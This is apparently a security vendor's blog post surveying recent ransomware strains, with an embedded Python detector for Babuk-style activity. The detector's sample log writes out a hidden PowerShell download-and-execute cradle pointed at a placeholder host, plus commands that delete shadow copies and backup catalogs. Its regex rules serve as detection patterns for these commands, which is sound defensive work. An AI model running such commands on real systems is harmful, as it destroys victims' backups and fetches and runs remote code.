New ransomware is like any viral outbreak: it continues to evolve and mutate into new variants or strains. When a known ransomware code sequence mutates, we refer to it as a variant. If it accumulates enough mutations that it shows distinct functional properties differing from the original, it is called a strain. Both biological and digital viral outbreaks are constantly evolving to escape detection and remediation techniques, and this evolution helps ensure their survival. Ransomware is a generic category that includes many strains and variants. We thought we would take a moment to highlight some of the more recent ransomware strains that have been detected lately.
The latest strain released by the ransomware gang Evil Corp, Macaw Locker, was launched in October against multiple victims. The strain gets its name from the fact that it encrypts targeted files and appends the “.macaw” extension to the file name. The attack also creates a ransom note in every directory that contains a summary of what the attack has done to the victim and directions on how to recover from it. Each victim is assigned a campaign ID as well as a negotiation page on the Macaw Locker Tor site that includes a chat box for communicating with the attackers. The victim is given a tool to decrypt three files for free to demonstrate that decryption works. Victims include a leading medical technology company that was forced to take down its IT systems across North and Central America. Another victim was a TV broadcasting station that lost access to its Active Directory infrastructure, which brought down many of its server operations. It is unknown whether the ransoms were paid, but the initial demands were as high as $40 million.
BlackMatter ransomware is a ransomware-as-a-service tool that first appeared on the scene over the summer. The creators of the strain required their affiliates to target companies with $100 million or more in revenue and at least 500 hosts. The group also paid up to a $100,000 bonus for exclusive access to a high-value network. They also forbade attacks on targets such as critical infrastructure facilities, hospitals and not-for-profit organizations. The BlackMatter ransomware tool was used against numerous companies based in the U.S., with extortion demands ranging from less than $100,000 up to $15 million. The string of successes achieved by the group drew a great deal of attention from government authorities and law enforcement. As a result, the group announced in November that it was disbanding and no longer making its tool available.
Cisco Talos issued a warning in early November about a new variant of Babuk ransomware, which it discovered weeks earlier in October. While the original malware code took advantage of vulnerabilities found within Microsoft Exchange Server, the latest release of Babuk targets multiple Windows platforms. In addition to encrypting files, it disrupts system backup processes and deletes any discovered volume shadow copies. It uses a PowerShell command to download the payload, which then launches the malicious code across the network.
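The two behaviours attributed to the new Babuk variant above, a PowerShell download stage followed by destruction of backups and volume shadow copies, are exactly the kind of thing process-creation telemetry can flag before encryption finishes. The following Python detector is an added example written for this post; it is not code from Cisco Talos, TitanHQ or any Babuk analysis. The pipe-separated log layout, the host names and every command line in the sample are constructed, and the patterns are generic defender signatures for shadow-copy deletion (vssadmin/wmic), backup catalog deletion (wbadmin) and PowerShell download cradles, not strings taken from the Babuk sample. The correlation step goes a little beyond the text: it raises a host to high severity only when the download stage and the backup destruction occur on the same host within a short window, which cuts down on alerts from legitimate admin scripts.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample process-creation events. The layout
# "timestamp|host|parent_image|image|command_line" is an assumption for
# this example, not any vendor's real log format.
SAMPLE_LOG = r"""
2021-11-02T10:14:03Z|WS-017|explorer.exe|winword.exe|"C:\Program Files\Microsoft Office\WINWORD.EXE" /n invoice.docm
2021-11-02T10:14:09Z|WS-017|winword.exe|powershell.exe|powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
2021-11-02T10:15:41Z|WS-017|cmd.exe|vssadmin.exe|vssadmin.exe delete shadows /all /quiet
2021-11-02T10:15:42Z|WS-017|cmd.exe|wbadmin.exe|wbadmin delete catalog -quiet
2021-11-02T10:20:00Z|WS-018|services.exe|svchost.exe|svchost.exe -k netsvcs
2021-11-02T10:21:13Z|WS-018|explorer.exe|powershell.exe|powershell.exe -File C:\Scripts\inventory.ps1
"""

# Generic command-line patterns (assumed, widely used defender heuristics).
RULES = {
    "shadow_copy_deletion": re.compile(
        r"\bvssadmin(\.exe)?\s+delete\s+shadows|\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    "backup_catalog_deletion": re.compile(
        r"\bwbadmin(\.exe)?\s+delete\s+catalog", re.I),
    "powershell_download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|start-bitstransfer", re.I),
    "powershell_evasion_flags": re.compile(
        r"-(nop|noprofile)\b|-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass"
        r"|-e(ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
}

BACKUP_DESTRUCTION = {"shadow_copy_deletion", "backup_catalog_deletion"}


@dataclass(frozen=True)
class Finding:
    timestamp: datetime
    host: str
    image: str
    rule: str


def parse_line(line):
    """Split one constructed log line into its five fields."""
    ts, host, parent, image, cmd = line.split("|", 4)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, parent, image, cmd


def detect(log_text):
    """Return one Finding per (event, rule) pair whose command line matches."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, host, _parent, image, cmd = parse_line(raw)
        for rule, pattern in RULES.items():
            if pattern.search(cmd):
                findings.append(Finding(ts, host, image, rule))
    return findings


def correlate(findings, window=timedelta(minutes=30)):
    """Hosts where a PowerShell download stage is followed, within `window`,
    by shadow-copy or backup-catalog destruction: the chain described for
    the Babuk variant. Returns a sorted list of host names."""
    by_host = defaultdict(list)
    for f in findings:
        by_host[f.host].append(f)
    flagged = set()
    for host, fs in by_host.items():
        downloads = [f for f in fs if f.rule == "powershell_download_cradle"]
        destruction = [f for f in fs if f.rule in BACKUP_DESTRUCTION]
        if any(timedelta(0) <= d.timestamp - p.timestamp <= window
               for p in downloads for d in destruction):
            flagged.add(host)
    return sorted(flagged)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for f in found:
        print(f"{f.timestamp.isoformat()} {f.host} {f.image}: {f.rule}")
    print("high-severity hosts:", correlate(found))
```

On the constructed sample, WS-018 produces no findings at all (a plain `-File` invocation of an inventory script matches neither the cradle nor the evasion-flag rule), while WS-017 trips four rules and is the only host the correlation step flags. In production the same logic would run over Sysmon Event ID 1 or Windows Security 4688 command lines, which is where the command-line field in this toy format comes from.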
While Jigsaw ransomware has been around for several years, we wanted to highlight it for its unique voracity. In addition to encrypting the victim’s files, it methodically begins deleting files over a 72-hour period or until the ransom is paid. Should the time period expire, all files are deleted. The enclosed ransom note warns the victim that rebooting the infected machine will result in the deletion of 1,000 files. The malware is delivered through phishing attacks and some adware on infected sites. There is some good news: the malware is incapable of moving laterally, so it only affects the machine that downloads it. You can also halt the file deletion by ending the malware’s process in Task Manager.
AvosLocker was discovered over the summer. One of its victims was the city of Geneva, Ohio, which dealt with the classic double extortion attack that has grown popular recently. In addition to having the city’s files encrypted, the attackers also threatened to release exfiltrated data to the public that included tax returns, court records and social security numbers. AvosLocker is another ransomware-as-a-service tool, and the group behind it is selectively seeking affiliates that can prove access to a possible target. The ransomware strain is named after its signature of appending the “.avos” extension to all encrypted files. The attackers have been demanding ransoms of approximately $200,000.
In addition to the evolving code variants, the attack objectives of ransomware are evolving as well. No longer is ransomware simply used to encrypt files. The practice of stealing the data prior to encrypting it, and releasing it to the public in the event of nonpayment, serves as one more way to ensure getting paid should the victimized organization be able to restore its files from backup. This double extortion approach is now evolving into triple or quadruple extortion. Upon infiltrating a network, attackers are now maximizing their access to achieve other objectives such as launching crypto mining operations on the victim’s server platforms, initiating denial-of-service attacks, and stealing user credentials that they can then reuse in other types of attacks. Ransomware is quickly becoming a multi-threat invasion.
Because of its evolving nature, you cannot rely on signature-based endpoint security solutions alone to combat ransomware. You need the comprehensive coverage of a multilayer security strategy that includes both email and web filtering. TitanHQ filtering solutions can’t eradicate a ransomware infection; instead, they help prevent strains from being delivered in the first place through email and web traffic. Find out how you can stop the malicious strains from infecting your enterprise today. Contact TitanHQ today.